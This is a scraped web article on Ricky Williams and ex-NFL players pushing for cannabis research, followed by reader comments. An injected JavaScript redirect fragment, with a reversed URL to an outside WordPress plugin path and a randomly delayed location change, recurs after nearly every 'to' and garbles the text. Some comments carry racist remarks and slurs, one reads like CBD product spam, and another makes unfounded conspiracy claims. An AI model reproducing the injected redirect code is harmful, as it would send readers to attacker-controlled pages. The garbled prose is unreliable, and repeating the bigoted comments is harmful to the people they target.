Williams, the Heisman-winning running back who set multiple rushing records for the Miami Dolphins, was suspended by the NFL and then retired under a cloud of shame in 2003 for testing positive for marijuana.

Dolphins fans, the media, and the league all turned on Williams, labeling him an underachiever with a drug problem. Williams ultimately returned in 2005 and played several more seasons in the NFL, but the stigma never went away.

But what if the league and the public were wrong toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to judge Ricky Williams? What if he was just ahead of his time?

Some researchers are now finding evidence that cannabidiol (CBD) and tetrahydrocannabinol (THC) have two major benefits for athletes: 1) they act as a non-addictive pain reliever and 2) they can protect the brain from injury. These healing properties could be beneficial in a league where opioid addiction and concussions have become significant health concerns.

Williams is now part of a group of former NFL players who are lobbying the league toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to reconsider its position on marijuana.

The former NFL star was one of several athletes in attendance at the 420 Games in Santa Monica, CA this Spring representing the Gridiron Cannabis Coalition, a group dedicated toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to the advancement of medical marijuana.

Cannabis is a banned substance under the NFL’s player agreement and commissioner Roger Goodell has made clear that he will not change league policy toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to allow medicinal marijuana until research proves it is a legitimate drug.

But marijuana is classified as an illegal substance at the federal level, which makes getting grants and approval for research a long and arduous process. So former players are putting up their own money toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to get around the government’s tight regulations and fund their own studies.

“Cannabis has been in the closet. It’s been suppressed. It’s coming out,” says Constance Finley, founder of the cannabis extract firm Constance Therapeutics. Finley is working with the Gridiron Cannabis Coalition toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to produce the evidence players need toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to change NFL policy.

“The owners have toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to see responsible, smart people who are completely mainstream toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to have their experiences reflected, have their minds opened,” says Finley. “I think that we could move past the impasse with the level of research that we’re talking about doing. It will be irrefutable.”

Players like Ricky Williams are hoping their participation in these studies can lead toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to change and help future athletes stay healthy long after their playing days are over.

“Hopefully as public opinion starts toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to change the leagues will soften their stance,” says Williams. “Especially the NFL. “Wouldn’t it be great if the NBA and the NFL and the other professional sports organizations accepted the validity of the science and the experience of their players and we came toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to a compromise of efficacy and performance and using cannabis oil toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to promote health instead of using opioids and other drugs [that] kill health?,” says Finley. “There’s this marvelous plant that with regular use could really truly minimize that damage. 1. Jacob Throwaway says:

They should be able to use it, but as of right now there now allowed. Your getting paid millions to play a game, and one of your only rules is to not smoke. Its fucking simple, follow the rules and you wont get in trouble. Try and make a change, but dont break the rules and dont expect to get introuble.

  2. Calvin Smith says:

Wait, what? They actually test players for marijuana usage? I just assumed everyone in the NFL was using marijuana. They're all black after all…

  3. sparky matthews says:

Everybody knows people join the NFL only to have access to high grade weed. There is absolutely no reason why anyone would play Foose Ball for anything else..

  4. pbkayakyer says:

No they shouldn't. Only an idiot would think that they should.

  5. Shankszz says:

Eh…The NFL should not be claimed as 'non-profit' and be forced to pay taxes, like everybody else.

  6. TheeBudGuru says:

Based on the comments, "Reefer Madness" is alive and well! Fucking Mental Midgets!

  7. Juan Fernandez says:

Marijuana helps prevent traumatic brain injury, relieve pain, and is not performance enhancing. The NFL is in the wrong yet again. I can not in good faith support them or their partners anymore.

  8. Dontwantlove says:

    Christ already with the weed!!!
With all the crap that's going on, and having Johnson as the worst Libertarian candidate ever, this is all you seem to talk about. If these are your main priorities, I pity you.

Legalize all drugs in my opinion, but this obsession is stupid beyond words.

  9. Michael Deth says:

It makes sense why it's illegal. Companies who are in the dangerous synthetic drugs business can't complete with God's simple remedy for pain.

  10. mxp2000 says:

Medical marijuana would be too helpful in controlling pain and reducing brain injuries.

  11. s0nnyburnett says:

Why do I care about what the NFL wants to do with it's own players? If you want to play for them follow their rules, that's it.
What's the point of this? To get a government intervention in football? Is this really on of the biggest problem right now?

  12. aramagoo says:

The experiments will go forward, and human beings will learn all over again.

  13. tranquilizer agent says:

Why the f would you smoke marijuana before playing sport? Pot incapacitates you, i've smoked pot plenty of times and it has not made me better at anything.

  14. kmg501 says:

Unlike the pot head Gary Johnson, I'm for full constitutalization of whatever someone wants to put into their body. I don't recommend it but if you want to burn down your own house, oh well.

  15. Ibee Levon says:

Well go  put together a few  marijuana player teams and find out.

  16. lek844 says:

The title of this video had me thinking that the entire Seahawks team is already high on weed.

  17. Robert Siegfried says:

    dude weed lmao

  18. chbrules says:

So over all this pro-marijuana shit the libertarian statists are on about. We get it, the war on drugs is stupid and doesn't work. You're preaching to the choir. Move the fuck on.

  19. EvenFlow406 says:

How much is the Libertarian Party going to shrink once pot is legal?

  20. Cooper Hoover says:

I was a limo driver and every athlete I drove smoked.

  21. Kyle P says:

I have no problem with private organizations holding standards for its employees which can include standards on substance use. Private prohibition is not the equivalent to government prohibition. As long as government is not getting involved then I see no problem with it. If players don't like it then go to the CFL. Now I agree that there should be no government prohibition in any narcotic for recreational use, research use, etc.

  22. Simon TV says:

The only way to end prohibition is to take the final say away from the entities that benefit from prohibition.

  23. Fourth Root says:

Not only do I think smoking weed should be allowed in the NFL, I think it should be MANDATORY. They should have to take a hit on every turnover. Now THAT would be interesting.

  24. Fernando Pulido says:

I find it very hard that the NFL would go against the Federal Government. The Feds give HUGE tax breaks to the NFL, where they basically pay nothing in taxes. You think they are going to want to fight them on the marijuana issue? No fucking way.

  25. Retarded Cock says:

How about don't break the contract you signed and don't break the law? Wait till its federal legal retards in the nfl

  26. watchdealer11 says:

MARIJUANA IS THE DEVILS GRASS MMMKAY! ITS BAD FOR U MMMKAY! BELIEVE IN GOD AND JESUS BECAUSE MARIJUANA IS EVEL!!!

  27. 9thchild says:

They should stop testing. Why on earth do they test for this type of stuff? It does nothing for the league. They know all their players smoke pot. You could avoid all these suspensions and PR nightmares by just not testing! Also I'm sure it would save money.

  28. Benjamin Burkhardt says:

Yet many people are willing to pop Aspirin like candy.

  29. It's Matt says:

"Medical" marajuana may or may not have any efficacy but all the stoners who get high saying "I'm just treating my pain, glaucoma, etc. man" make the "medical" part of cannabis a laughed at joke. Have some respect for yourself and us. Own that you smoke pot only to get high. At least we'll be able to respect you for being honest.
Part of the lie of MM is most of the people I know who claim they smoke pot for medical reasons are young. If pot is so good at treating "pain," why aren't old people, who are more likely to actually have pain, all over it?

  30. Casey Hansen says:

Yea! I feel real bad for an NFL Player that makes millions and has access to anything he desires. But, hey who are we? Poor working stiffs that spend our hard earned dollars to go watch a stupid game, played by grown men that make millions of dollars…. Does not add up.

  31. Alec Scott says:

It's amazing to me that Josh Gordon has missed a season and a half for Marijuana while there are players out there who beat women getting 10 games max.

  32. James Mckelvey says:

CBD oil from illegal (in most states) marijuana is not a good way to help medical problems because there isn't very much in it in the plant with THC. However, the "legal" CBD oil from "legal" Hemp is the best source in a very abundant form. This is a psy-op video from start to finish with the trigger word "medical marijuana." If you use medical hemp based CBD oil the amount of THC in it is not detectable by current drug screens so the NFL would have no way of knowing what you are using. Anyone who moves from one state where "medical marijuana" is illegal to a state where it it legal, it seems to me, is on the payroll of big pharma to keep the psy-op operation going or very foolish. CBD oil is available in every state and there is not an age requirement for it at least since the court ruling on CBD Oil. Here is the actual court case on CBD oil from Hemp: http://caselaw.findlaw.com/us-9th-circuit/1253723.html

  33. The Senate says:

  34. Michelle Dwyer says:

I just had a serious concussion about a month ago and a family friend who is a doctor recommended I try CBD to help with healing. He recommended I go through a company called Quanta so obviously I did my research before but ended up going with the company. It was much cheaper than others. Anyways, I tried it and the amount it helped was tremendous and it sped up my recovery dramatically. Hopefully people begin to understand the benefits CBD has and stop criticizing marijuana

  35. twoyears23 says:

All a gateway drug to worse things. Look at the false causes that get created out of these things. How insane it is. Those would have to be high to believe that sickness that comes from it is the cure all. America, Americans and the world begin to move away from these things. It turns Americans off, as they despise all that comes from it and represents. The American people begin to leave the sporting arenas for those places of truth. The churches representing Jesus Christ, The Holy Spirit and the Almighty God get packed to the rafters, while sporting venues struggle to find patrons and to stay afloat until they come to what Americans strongly desire–Our roots based in strong white conservative ideas based in all things truth. Americans and the world run to the truth and run even faster away from the lie.
